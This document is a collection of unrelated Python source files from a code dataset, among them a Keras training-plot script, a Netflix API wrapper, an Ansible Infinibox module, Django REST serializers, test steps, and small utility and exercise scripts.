plt.plot(epochs_range, val_acc, '.-g', label='Validation Accuracy')\r\n plt.legend(loc='best')\r\n plt.title('Training and Validation Accuracy')\r\n\r\n plt.figure(figsize=(7,7))\r\n plt.plot(epochs_range, loss, '.-r', label='Training Loss')\r\n plt.plot(epochs_range, val_loss, '.-g', label='Validation Loss')\r\n plt.legend(loc='best')\r\n plt.title('Training and Validation Loss')\r\n plt.show()\r\n\r\nprint_plot()\r\n\r\nfrom tensorflow.keras.utils import plot_model\r\nplot_model(model, model_name+'_info.png', show_shapes=True)\r\n\r\nimport seaborn as sns\r\nplt.figure(figsize=(7, 7))\r\nsns.set(font_scale=1.1)\r\nax = plt.subplot()\r\nsns.heatmap(cm, annot=True, fmt=\"d\", ax = ax, annot_kws={\"size\": 14})\r\nax.set_xlabel('Predicted');ax.set_ylabel('Actual')\r\nax.set_title('Confusion Matrix')\r\nax.xaxis.set_ticklabels(class_names)\r\nax.yaxis.set_ticklabels(class_names)\r\nplt.show()\r\nprint(\"----------------------------------------------------------\")\r\n\r\nend_time = time.time() - start_time\r\nprint(\"\\nCzas: %.2f sec\" % (end_time))","sub_path":"projekt_2_cnn.py","file_name":"projekt_2_cnn.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"474237600","text":"import json\r\nimport requests as req\r\n\r\n#all Code Written by Odin https://github.com/O-D-1-N\r\n\r\nclass Matchflix():\r\n def __init__(self, movieId):\r\n self.movieId = movieId\r\n \r\n def GetDetails(self):\r\n url = \"https://unogsng.p.rapidapi.com/title\"\r\n querystring = {\"netflixid\":self.movieId}\r\n headers = {\r\n 'x-rapidapi-host': \"unogsng.p.rapidapi.com\",\r\n 'x-rapidapi-key': \"api-KEY\"\r\n }\r\n response = req.request(\"GET\", url, headers=headers, params=querystring)\r\n self.Details = json.loads(response.content)\r\n\r\n def GetCountries(self):\r\n url = \"https://unogsng.p.rapidapi.com/titlecountries\"\r\n querystring = {\"netflixid\":self.movieId}\r\n headers = {\r\n 'x-rapidapi-host': \"unogsng.p.rapidapi.com\",\r\n 'x-rapidapi-key': \"api-KEY\"\r\n }\r\n response = req.request(\"GET\", url, headers=headers, params=querystring)\r\n obj = json.loads(response.content)\r\n countries = []\r\n i = 0\r\n for i in range(len(obj['results'])):\r\n country = obj['results'][i]['country']\r\n countries.append(country)\r\n i += 1\r\n self.Countries = countries\r\n \r\n def isInSweden(self):\r\n if 'Sweden' in str(self.Countries):\r\n return True\r\n else:\r\n return False\r\n def isInUK(self):\r\n if 'United Kingdom' in str(self.Countries):\r\n return True\r\n else:\r\n return False\r\n def isInAmerica(self):\r\n if 'United States' in str(self.Countries):\r\n return True\r\n else:\r\n return False \r\n def getTitle(self):\r\n obj = self.Details\r\n title = obj['results'][0]['title']\r\n return title\r\n def getPlot(self):\r\n obj = self.Details\r\n snippet = obj['results'][0]['imdbplot']\r\n return snippet\r\n def getImdbruntime(self):\r\n obj = self.Details\r\n runtime = obj['results'][0]['imdbruntime']\r\n return runtime\r\n def getYear(self):\r\n obj = self.Details\r\n year = obj['results'][0]['year']\r\n return year\r\n def getGenre(self):\r\n obj = self.Details\r\n genre = obj['results'][0]['imdbgenre']\r\n return genre\r\n def getMatlabel(self):\r\n obj = self.Details\r\n matlabel = obj['results'][0]['matlabel']\r\n return matlabel\r\n def getImg(self):\r\n obj = self.Details\r\n img = obj['results'][0]['img']\r\n return img\r\n def getSynopsis(self):\r\n obj = self.Details\r\n synopsis = 
obj['results'][0]['synopsis']\r\n return synopsis\r\n def getRuntime(self):\r\n obj = self.Details\r\n runtime = obj['results'][0]['imdbruntime']\r\n return runtime\r\n","sub_path":"MatchFlix.py","file_name":"MatchFlix.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"369878918","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# Copyright: (c) 2020, Infinidat \n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\nfrom infi.dtypes.iqn import make_iscsi_name\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = r'''\n---\nmodule: infini_cluster\nversion_added: 2.9\nshort_description: Create, Delete and Modify Host Cluster on Infinibox\ndescription:\n - This module creates, deletes or modifies host clusters on Infinibox.\nauthor: David Ohlemacher (@ohlemacher)\noptions:\n name:\n description:\n - Cluster Name\n required: true\n state:\n description:\n - Creates/Modifies Cluster when present, removes when absent, or provides\n details of a cluster when stat.\n required: false\n default: present\n choices: [ \"stat\", \"present\", \"absent\" ]\nextends_documentation_fragment:\n - infinibox\n'''\n\nEXAMPLES = r'''\n- name: Create new cluster\n infini_cluster:\n name: foo_cluster\n user: admin\n password: secret\n system: ibox001\n'''\n\n# RETURN = r''' # '''\n\nfrom ansible.module_utils.basic import AnsibleModule, missing_required_lib\nfrom ansible.module_utils.infinibox import \\\n HAS_INFINISDK, api_wrapper, infinibox_argument_spec, \\\n get_system, get_cluster, unixMillisecondsToDate, merge_two_dicts\n\n\n@api_wrapper\ndef get_host_by_name(system, host_name):\n \"\"\"Find a host by the name specified in the module\"\"\"\n host = None\n\n for a_host in system.hosts.to_list():\n a_host_name = a_host.get_name()\n if a_host_name == host_name:\n host = a_host\n break\n return host\n\n\n@api_wrapper\ndef create_cluster(module, system):\n print(\"create cluster\")\n changed = True\n if not module.check_mode:\n cluster = system.host_clusters.create(name=module.params['name'])\n cluster_hosts = module.params['cluster_hosts']\n for cluster_host in cluster_hosts:\n if cluster_host['host_cluster_state'] == 'present':\n host = get_host_by_name(system, cluster_host['host_name'])\n cluster.add_host(host)\n print(\"Added host {0} to cluster {1}\".format(host.get_name, cluster.get_name()))\n else:\n print(\"Skipped adding (absent) host {0} to cluster {1}\".format(host.get_name, cluster.get_name()))\n return changed\n\n\n@api_wrapper\ndef update_cluster(module, system, cluster):\n print(\"update cluster\")\n changed = False\n\n # e.g. 
of one host dict found in the module.params['cluster_hosts'] list:\n # {host_name: <'some_name'>, host_cluster_state: <'present' or 'absent'>}\n module_cluster_hosts = module.params['cluster_hosts']\n current_cluster_hosts_names = [host.get_name() for host in cluster.get_field('hosts')]\n print(\"current_cluster_hosts_names:\", current_cluster_hosts_names)\n for module_cluster_host in module_cluster_hosts:\n module_cluster_host_name = module_cluster_host['host_name']\n print(\"module_cluster_host_name:\", module_cluster_host_name)\n # Need to add host to cluster?\n if module_cluster_host_name not in current_cluster_hosts_names:\n if module_cluster_host['host_cluster_state'] == 'present':\n host = get_host_by_name(system, module_cluster_host_name)\n if not host:\n msg = 'Cannot find host {0} to add to cluster {1}'.format(\n module_cluster_host_name,\n cluster.get_name(),\n )\n module.fail_json(msg=msg)\n cluster.add_host(host)\n print(\"Added host {0} to cluster {1}\".format(host.get_name(), cluster.get_name()))\n changed = True\n # Need to remove host from cluster?\n elif module_cluster_host_name in current_cluster_hosts_names:\n if module_cluster_host['host_cluster_state'] == 'absent':\n host = get_host_by_name(system, module_cluster_host_name)\n if not host:\n msg = 'Cannot find host {0} to add to cluster {1}'.format(\n module_cluster_host_name,\n cluster.get_name(),\n )\n module.fail_json(msg=msg)\n cluster.remove_host(host)\n print(\"Removed host {0} from cluster {1}\".format(host.get_name(), cluster.get_name()))\n changed = True\n return changed\n\n\n@api_wrapper\ndef delete_cluster(module, cluster):\n assert cluster, \"Cluster not found\"\n changed = True\n if not module.check_mode:\n cluster.delete()\n return changed\n\n\ndef get_sys_cluster(module):\n system = get_system(module)\n cluster = get_cluster(module, system)\n return (system, cluster)\n\n\ndef get_cluster_fields(cluster):\n fields = cluster.get_fields(from_cache=True, raw_value=True)\n created_at, created_at_timezone = unixMillisecondsToDate(fields.get('created_at', None))\n field_dict = dict(\n hosts=[],\n id=cluster.id,\n created_at=created_at,\n created_at_timezone=created_at_timezone,\n )\n hosts = cluster.get_hosts()\n for host in hosts:\n host_dict = {\n 'host_id': host.id,\n 'host_name': host.get_name(),\n }\n field_dict['hosts'].append(host_dict)\n return field_dict\n\n\ndef handle_stat(module):\n system, cluster = get_sys_cluster(module)\n cluster_name = module.params[\"name\"]\n if not cluster:\n module.fail_json(msg='Cluster {0} not found'.format(cluster_name))\n field_dict = get_cluster_fields(cluster)\n result = dict(\n changed=False,\n msg='Cluster stat found'\n )\n result = merge_two_dicts(result, field_dict)\n module.exit_json(**result)\n\n\ndef handle_present(module):\n system, cluster = get_sys_cluster(module)\n cluster_name = module.params[\"name\"]\n if not cluster:\n changed = create_cluster(module, system)\n msg='Cluster {0} created'.format(cluster_name)\n module.exit_json(changed=changed, msg=msg)\n else:\n changed = update_cluster(module, system, cluster)\n if changed:\n msg='Cluster {0} updated'.format(cluster_name)\n else:\n msg='Cluster {0} required no changes'.format(cluster_name)\n module.exit_json(changed=changed, msg=msg)\n\n\ndef handle_absent(module):\n system, cluster = get_sys_cluster(module)\n cluster_name = module.params[\"name\"]\n if not cluster:\n changed = False\n msg=\"Cluster {0} already absent\".format(cluster_name)\n else:\n changed = delete_cluster(module, cluster)\n 
msg=\"Cluster {0} removed\".format(cluster_name)\n module.exit_json(changed=changed, msg=msg)\n\n\ndef execute_state(module):\n state = module.params['state']\n try:\n if state == 'stat':\n handle_stat(module)\n elif state == 'present':\n handle_present(module)\n elif state == 'absent':\n handle_absent(module)\n else:\n module.fail_json(msg='Internal handler error. Invalid state: {0}'.format(state))\n finally:\n system = get_system(module)\n system.logout()\n\n\ndef check_options(module):\n state = module.params['state']\n if state == 'present':\n if module.params['cluster_hosts'] is None:\n module.fail_json(msg='Option cluster_hosts, a list, must be provided')\n\n cluster_hosts = module.params['cluster_hosts']\n for host in cluster_hosts:\n try:\n # Check host has required keys\n valid_keys = ['host_name', 'host_cluster_state']\n for valid_key in valid_keys:\n _ = host[valid_key]\n # Check host has no unknown keys\n if len(host.keys()) != len(valid_keys):\n raise KeyError\n except KeyError:\n msg = 'With state present, all cluster_hosts ' \\\n + 'require host_name and host_cluster_state key:values ' \\\n + 'and no others'\n module.fail_json(msg=msg)\n\n\ndef main():\n argument_spec = infinibox_argument_spec()\n argument_spec.update(\n dict(\n name=dict(required=True),\n state=dict(default='present', choices=['stat', 'present', 'absent']),\n cluster_hosts=dict(required=False, type=list),\n )\n )\n\n module = AnsibleModule(argument_spec, supports_check_mode=True)\n\n if not HAS_INFINISDK:\n module.fail_json(msg=missing_required_lib('infinisdk'))\n\n check_options(module)\n execute_state(module)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/infinidat/infinibox/plugins/modules/infini_cluster.py","file_name":"infini_cluster.py","file_ext":"py","file_size_in_byte":8819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"381655765","text":"#!/usr/bin/env python3\r\n# coding: utf-8\r\n# Author : xtrdb.net\r\n# File : memory_info.py\r\n# Time : 2017/12/22\r\n\r\n\r\nimport psutil\r\nimport pprint\r\n\r\ndef mem_get():\r\n mem_info = {}\r\n date = psutil.virtual_memory()\r\n mem_info[\"total\"] = date[0]/1024/1024/1024\r\n mem_info[\"available\"] = date[1]/1024/1024/1024\r\n\r\n html_str= \"\"\r\n for i,j in mem_info.items():\r\n html_str += \"\" %(i,j)\r\n html_str +=\"
    <tr><td>status</td><td>data</td></tr><tr><td>%s</td><td>%.2f</td></tr></table>
    \"\r\n return html_str\r\n\r\n# with open(\"mem_info.html\",'w') as f:\r\n# f.write(html_str)","sub_path":"memory_info.py","file_name":"memory_info.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"550943370","text":"import allure\nfrom allure.constants import AttachmentType\nfrom Locators import media_page_locators\nfrom Steps import login_steps\nfrom Utils import params\nfrom selene.bys import *\nfrom selene.conditions import *\nfrom selene.tools import *\n\n\ndef add_media(driver, photo_path, **kwargs):\n try:\n login_steps.login_as_business(driver, email_address=params.email_value, password=params.password_value)\n s(by_link_text(media_page_locators.link_media)).click()\n with allure.MASTER_HELPER.step(\"Media page\"):\n allure.MASTER_HELPER.attach('screenshot', driver.get_screenshot_as_png(), type=AttachmentType.PNG)\n if kwargs.get('add_video'):\n s(media_page_locators.input_video).set(params.video_link)\n s(by_xpath(media_page_locators.button_link_video)).click()\n s(by_xpath(media_page_locators.link_add_photo)).should_be(clickable)\n with allure.MASTER_HELPER.step(\"Add video\"):\n allure.MASTER_HELPER.attach('screenshot', driver.get_screenshot_as_png(), type=AttachmentType.PNG)\n if kwargs.get('add_photo'):\n s(by_xpath(media_page_locators.link_add_photo)).click()\n s(media_page_locators.button_crop).click()\n with allure.MASTER_HELPER.step(\"Crop modal window\"):\n allure.MASTER_HELPER.attach('screenshot', driver.get_screenshot_as_png(), type=AttachmentType.PNG)\n s(media_page_locators.button_browse).set(photo_path)\n s(\"crop-loader-spinner\").should_not_be(visible)\n s(media_page_locators.button_crop).click()\n with allure.MASTER_HELPER.step(\"Added image in the Crop modal window\"):\n allure.MASTER_HELPER.attach('screenshot', driver.get_screenshot_as_png(), type=AttachmentType.PNG)\n s(by_xpath(media_page_locators.load_spinner)).should_not_be(visible)\n with allure.MASTER_HELPER.step(\"List of media\"):\n allure.MASTER_HELPER.attach('screenshot', driver.get_screenshot_as_png(), type=AttachmentType.PNG)\n # Delete media\n if kwargs.get('delete_video'):\n s(media_page_locators.video_player).hover().s(by_xpath(media_page_locators.remove_video)).click()\n if kwargs.get('delete_photo'):\n s(by_xpath(media_page_locators.photo_view)).hover().s(by_xpath(media_page_locators.remove_photo)).click()\n except AttributeError:\n with allure.MASTER_HELPER.step(\"Screen with error message\"):\n allure.MASTER_HELPER.attach('screenshot', driver.get_screenshot_as_png(), type=AttachmentType.PNG)\n","sub_path":"Steps/BuildStorefront/media_steps.py","file_name":"media_steps.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"83856604","text":"#!/usr/bin/env python3\nimport json\nfrom urllib.request import urlopen\n\nurlPrice = urlopen('https://www.bitstamp.net/api/ticker/').read()\nresultUrlPrice = json.loads(urlPrice)\ndollarPerBtc = float(resultUrlPrice['ask'])\n\nsatPerDollar = 100000000 / dollarPerBtc\n\nprint(\"Sats/Dollar : {:.0f}\".format(satPerDollar))\n","sub_path":"pythonscripts/satsperdollar.py","file_name":"satsperdollar.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"24445148","text":"from rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\nfrom 
core.models import *\nfrom django.contrib.auth.models import *\nfrom rest_framework.exceptions import APIException\nfrom django.conf import settings\n# from rest_framework.validators import *\nfrom drf_extra_fields.fields import Base64ImageField # for image base 64\nfrom django.db import transaction, IntegrityError\nfrom master.models import TMasterModuleOther\n\nclass TCorePermissionsSerializer(serializers.ModelSerializer):\n cp_created_by = serializers.HiddenField(default=serializers.CurrentUserDefault())\n class Meta:\n model = TCorePermissions\n fields = ('id','cp_u','cp_g', 'cp_o','cp_created_by')\n\n # def create(self, validated_data):\n # permissions = super(TCorePermissionsSerializer, self).create(validated_data)\n # permissions.save()\n # return permissions\nclass TCoreModuleSerializer(serializers.ModelSerializer):\n \"\"\"docstring for ClassName\"\"\"\n # cm_icon = Base64ImageField()\n cm_created_by = serializers.HiddenField(default=serializers.CurrentUserDefault())\n # cm_name = serializers.CharField(required=True)\n # cm_url = serializers.CharField(required=True)\n class Meta:\n model = TCoreModule\n fields = ('id','cm_name', 'cm_icon','cm_desc','cm_url','cm_permissions', 'cm_created_by', 'cm_is_editable')\nclass TCoreModuleListSerializer(serializers.ModelSerializer):\n \"\"\"docstring for ClassName\"\"\"\n # cm_icon = Base64ImageField() \n cm_permissions = TCorePermissionsSerializer()\n class Meta:\n model = TCoreModule\n fields = ('id','cm_name', 'cm_icon','cm_desc','cm_url','cm_permissions')\nclass TCoreRoleSerializer(serializers.ModelSerializer):\n \"\"\"docstring for ClassName\"\"\"\n cr_created_by = serializers.HiddenField(default=serializers.CurrentUserDefault())\n class Meta:\n model = TCoreRole\n fields = ('id','cr_name', 'cr_parent_id', 'cr_created_by')\nclass UnitAddSerializer(serializers.ModelSerializer):\n c_created_by = serializers.CharField(default=serializers.CurrentUserDefault())\n c_owned_by = serializers.CharField(default=serializers.CurrentUserDefault())\n\n class Meta:\n model = TCoreUnit\n fields = ('id', 'c_name', 'c_created_by', 'c_owned_by')\n#:::::::::::::::: OBJECTS :::::::::::::#\nclass OtherAddSerializer(serializers.ModelSerializer):\n cot_created_by = serializers.CharField(default=serializers.CurrentUserDefault())\n parent_id = serializers.IntegerField(required=False)\n mmo_module = serializers.CharField(required=False)\n class Meta:\n model = TCoreOther\n fields = ('id','cot_name','description','parent_id','cot_created_by','mmo_module')\n def create(self, validated_data):\n try:\n cot_created_by = validated_data.get('cot_created_by')\n parent_id = validated_data.pop('parent_id') if 'parent_id' in validated_data else 0\n with transaction.atomic():\n cot_save_id = TCoreOther.objects.create(\n cot_name=validated_data.get('cot_name'),\n description=validated_data.get('description'),\n cot_created_by=cot_created_by,\n )\n master_module = TMasterModuleOther.objects.create(\n mmo_other = cot_save_id,\n mmo_module_id = validated_data.get('mmo_module'),\n parent_id = parent_id\n )\n response = {\n 'id': cot_save_id.id,\n 'cot_name': cot_save_id.cot_name,\n 'description': cot_save_id.description,\n 'mmo_module':master_module.mmo_module,\n 'parent_id':master_module.parent_id\n }\n return response\n except Exception as e:\n raise e\nclass OtherListSerializer(serializers.ModelSerializer):\n parent_name = serializers.CharField(required=False)\n class Meta:\n model = TMasterModuleOther\n fields = 
('id','mmo_other','mmo_module','parent_id','is_deleted','parent_name')\nclass OtherEditSerializer(serializers.ModelSerializer):\n cot_updated_by = serializers.CharField(default=serializers.CurrentUserDefault())\n parent_id = serializers.IntegerField(required=False)\n mmo_module = serializers.CharField(required=False)\n class Meta:\n model = TCoreOther\n fields = ('id', 'cot_name', 'description', 'parent_id', 'cot_updated_by', 'mmo_module')\n\n def update(self, instance, validated_data):\n try:\n print('validated_data',validated_data)\n cot_updated_by = validated_data.get('cot_updated_by')\n parent_id = validated_data.pop('parent_id') if 'parent_id' in validated_data else 0\n with transaction.atomic():\n instance.cot_name = validated_data.get('cot_name')\n instance.description = validated_data.get('description')\n instance.cot_updated_by = cot_updated_by\n instance.save()\n\n TMasterModuleOther.objects.filter(mmo_other=instance.id).delete()\n master_module = TMasterModuleOther.objects.create(\n mmo_other = instance,\n mmo_module_id = validated_data.get('mmo_module'),\n parent_id = parent_id\n )\n response = {\n 'id': instance.id,\n 'cot_name': instance.cot_name,\n 'description': instance.description,\n 'mmo_module':master_module.mmo_module,\n 'parent_id':master_module.parent_id\n }\n return response\n except Exception as e:\n raise e\nclass OtherDeleteSerializer(serializers.ModelSerializer):\n cot_updated_by = serializers.CharField(default=serializers.CurrentUserDefault())\n updated_by = serializers.CharField(default=serializers.CurrentUserDefault(),required=False)\n parent_id = serializers.IntegerField(required=False)\n mmo_module = serializers.CharField(required=False)\n is_deleted = serializers.CharField(required=False)\n class Meta:\n model = TCoreOther\n fields = ('id', 'cot_name', 'description', 'parent_id', 'cot_updated_by',\n 'mmo_module','updated_by','is_deleted')\n\n def update(self, instance, validated_data):\n try:\n cot_updated_by = validated_data.get('cot_updated_by')\n updated_by = validated_data.get('updated_by')\n instance.cot_is_deleted = True\n instance.cot_updated_by = cot_updated_by\n instance.save()\n #print('instance',instance)\n module_other = TMasterModuleOther.objects.filter(mmo_other=instance)\n #print('ModuleOther',module_other.query)\n for e_module_other in module_other:\n e_module_other.is_deleted = True\n e_module_other.updated_by = updated_by\n e_module_other.save()\n return instance\n except Exception as e:\n raise e","sub_path":"core/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":7117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"542377180","text":"#!/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\n# author: wangyadong\n\"\"\"\nnames = [\"wangyadong\", \"wuqing\", \"taoyake\", \"meizi\"]\nname2 = [1,2,3,4]\nprint(names)\nnames.append(\"lvyang\")\nprint(names)\nnames.insert(1,\"wangjian\")\nprint(names)\nnames.remove(\"wangjian\")\nprint(names)\nnames.pop()\nprint(names)\nprint(names.count(\"wuqing\"))\nnames.reverse()\nprint(names)\nnames.extend(name2)\nprint(names)\nprint(names.index(\"taoyake\"))\n\"\"\"\n\n\"\"\"\nimport copy\n\na = [\"wang\", \"li\", \"jun\", [\"tian\", \"xia\"]]\nb = copy.deepcopy(a)\nprint(a)\nprint(b)\na[3][0] = \"di\"\nprint(a)\nprint(b)\nprint(a[0:-1:2])\n\nfor i in a:\n print(i)\n\"\"\"\n\nimport copy\n\npersion=['name', ['saving', 
100]]\n\np1=copy.copy(persion)\np2=persion[:]\np3=list(persion)\n\np4=persion[:]\np5=persion[:]\nprint(p4)\nprint(p5)\np4[0]='wang'\np5[0]='li'\npersion[1][1]=200\nprint(p4)\nprint(p5)","sub_path":"date 2/new_dir/names_test.py","file_name":"names_test.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"154803798","text":"qs = ['请输入你姓名\\n',\r\n '请输入你电话\\n',\r\n '请输入你身份证\\n',\r\n '输入电话号码前三位乘以身份证前三位即可退出\\n']\r\nn = 0\r\ni = 1\r\nwhile True:\r\n a = input(qs[n])\r\n if a == '188*411'or a == '7708':\r\n print('恭喜你答对了')\r\n break\r\n n = (n+1) %4\r\n print('按q键退出')\r\n i = i +1\r\n if i>20:\r\n continue\r\n\r\n\r\n","sub_path":"tstp/文字游戏.txt.py","file_name":"文字游戏.txt.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"384047746","text":"# # You will have to figure out what parameters to include\n# # 🚨 All functions must use recursion 🚨`\n\n# # This function returns an array of all possible outcomes from flipping a coin N times.\n# # Input type: Integer \n# # H stands for Heads and T stands for tails\n# # Represent the two outcomes of each flip as \"H\" or \"T\"\n\n# def coin_flips(n):\n# # Write code here\n# pass\n\n# # print(coinFlips(2)) \n# # => [\"HH\", \"HT\", \"TH\", \"TT\"]\n\n# Current starts with empty string\n# Begin with empty results\ndef addFlips(n, result=[], current=''):\n if (n == 1): \n # This is the last flip, so add the result to the array\n result.append(current + 'H')\n result.append(current + 'T')\n else: \n # Let's say current is TTH (next combos are TTHH and TTHT)\n # Then for each of the 2 combos call add Flips again to get the next flips.\n addFlips(n - 1, result, current + 'H')\n addFlips(n - 1, result, current + 'T')\n return result\n\nprint(addFlips(1))","sub_path":"coin_flips.py","file_name":"coin_flips.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"478045239","text":"import os, re\nimport pandas as pd\nfrom config import config\nfrom nltk.tokenize import sent_tokenize\n\nnounPath = \".\" + os.sep + config[\"website\"] + os.sep + config[\"product\"] + \"_NOUN\" + \".csv\"\nnoundf = pd.read_csv(nounPath, usecols=[\"title_body\", \"selected\" ,\"key\"])\n\nemoPath = \".\" + os.sep + config[\"website\"] + os.sep + config[\"product\"] + \"_EMOTION\" + \".csv\"\nemodf = pd.read_csv(emoPath, usecols=[\"title_body\", \"selected\" ,\"key\"])\n\nintersectdf = pd.concat([noundf[\"title_body\"], noundf[\"key\"]], axis=1, keys=[\"title_body\", \"key\"])\n\nnoun_sentences = noundf[\"selected\"].fillna(\"\").apply(sent_tokenize)\nemo_sentences = emodf[\"selected\"].fillna(\"\").apply(sent_tokenize)\nintersect_sentences = []\nfor n_s, emo_s in zip(noun_sentences, emo_sentences):\n intersect = [s for s in n_s if s in emo_s]\n intersect_sentences.append(\" \".join(intersect))\nintersectdf[\"intersect\"] = intersect_sentences\n\n# Rearrange column order\nintersectdf = intersectdf[[\"title_body\", \"intersect\", \"key\"]]\n\n# Write to csv\noutputPath = \".\" + os.sep + config[\"website\"] + os.sep + config[\"product\"] + \"_INTERSECT.csv\"\nintersectdf.to_csv(outputPath, encoding='utf-8', 
index=False)","sub_path":"senti_noun_intersect.py","file_name":"senti_noun_intersect.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"538436814","text":"from pynput.keyboard import Key, Controller\nimport time\n\ndef keys(sent, delay):\n keyboard = Controller()\n for char in sent:\n if char == \";\":\n time.sleep(delay)\n else:\n keyboard.press(char)\n keyboard.release(char)\nwhile True:\n ns = input(\"Notes: \")\n time.sleep(5)\n keys(ns, 0.2)\n","sub_path":"Playnotes.py","file_name":"Playnotes.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"610148519","text":"from Goap.Action import Actions\nfrom Goap.Agent import Agent\n\n\nclass DeploymentAgent:\n\n PRIORITIES = [\n {'vpc': True, 'db': True, 'app': True},\n {'vpc': 'monitoring', 'db': 'monitoring', 'app': 'monitoring'},\n ]\n\n def __init__(self):\n # ACTIONS\n self.actions = Actions()\n # update app\n self.actions.add_action(\n name='UpdateApp',\n pre_conditions={'vpc': True, 'db': True, 'app': 'version_out_of_date'},\n effects={'vpc': True, 'db': True, 'app': True}\n )\n # rollback change\n self.actions.add_action(\n name='RollbackApp',\n pre_conditions={'vpc': True, 'db': True, 'app': 'need_rollback'},\n effects={'vpc': True, 'db': True, 'app': True}\n )\n # init_state = {'vpc': False, 'app': False, 'db': False}\n init_goal = {'vpc': True, 'db': True, 'app': True}\n self.ai = Agent(name='CloudBuilder', actions=self.actions, goal=init_goal)\n\n def run_agent(self):\n self.ai.run()\n\n\nif __name__ == '__main__':\n ai = PerformanceTracker()\n ai.run_agent()\n\n\n","sub_path":"examples/deployer.py","file_name":"deployer.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"351746586","text":"from django.urls import path\nfrom .views import(\nStudentCrearteAPIView,\nStudentRetriveAPIView,\nStudentUpdateAPIView,\nStudentListAPIView,\nStudentDestroyAPIView,\n)\n\nurlpatterns = [\n path('api/',StudentListAPIView.as_view(),name='list'),\n path('create',StudentCrearteAPIView.as_view(),name='create'),\n path('',StudentRetriveAPIView.as_view(),name='details'),\n path('/update',StudentUpdateAPIView.as_view(),name='update'),\n path('/delete',StudentDestroyAPIView.as_view(),name='delete'),\n\n]\n","sub_path":"studentapi/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"647372887","text":"\n# The simplest impossible math problem\n\n\ndef collatz(n):\n if n % 2 == 0:\n n=n//2\n # print(n)\n return n\n\n elif n % 2 == 1:\n n = 3 * n + 1\n # print(n)\n return n\n\ntry:\n number = int(input(\"Enter the number :\"))\n\n while number != 1:\n number = collatz(number)\n print(number)\n\nexcept ValueError:\n print(\"Enter a valid number!\")\n\n\n# No matter what the number is, the answer will evantually be 1.\n","sub_path":"collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"457215781","text":"#!/usr/bin/env python3\nfrom __future__ import (absolute_import, division, print_function)\n\nimport json\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\n### plotly\nfrom plotly import tools as 
toolsly\nfrom plotly.offline import plot\nimport plotly.graph_objs as go\n### matplotlib\n#import matplotlib\n#import matplotlib.pyplot as plt\n#plt.xkcd()\n\n# location of the script\nimport os\nimport sys\nscriptdir = os.path.split(os.path.abspath(sys.argv[0]))[0]\ndocsdir = os.path.abspath(os.path.join(scriptdir, '../docs/races/2017/BlueRidgeRelay/'))\nprint('Script located', scriptdir)\nprint('Data and output to', docsdir)\nRATINGS = {0:'UNKNOWN',\n 1:'easy',\n 2:'moderate',\n 3:'hard',\n 4:'very hard',\n 5:'mountain goat'}\n\ndef deltaTimeToStr(diff):\n symbol = '-'\n if diff.days < 0:\n symbol = '+'\n diff = str(diff).split(' ')[-1]\n diff = [int(value) for value in diff.split(':')[:2]]\n if symbol == '+':\n diff = abs(60*(diff[0]-24)+diff[1])-1\n diff = [int(diff / 60), diff % 60]\n return '%s%dh%02dm' % (symbol, diff[0], diff[1])\n\n######################################################################\n############################## calculate everything\n# TODO read in legs.json\n# ratings: 1:easy, 2:moderate, 3:hard, 4:very hard, 5:mountain goat\nlegs = pd.read_json(os.path.join(docsdir, 'legs.json'))\n#print(legs)\nlegs['number'] = legs['number'].astype(int)\nprint('the race is', legs['miles'].size, 'for', legs['miles'].sum(), 'miles')\n'''\n# setup list of legs\nlegs = np.array([4.5, 5.4, 5.5])\n#print('short', legs)\nlegs_full = np.tile(legs,8)\nlegs_ultra = legs_full[:12]+legs_full[1:13]\nlegs_full = np.insert(legs_full, 0, 0.)\nlegs_ultra = np.insert(legs_ultra, 0, 0.)\n#print('full ', legs_full, legs_full.size, legs_full.sum())\n#print('ultra', legs_ultra, legs_ultra.size, legs_ultra.sum())\n'''\n\n# setup list of all runners\nrunner = np.arange(9)+1 # team of nine this time\n#runner = 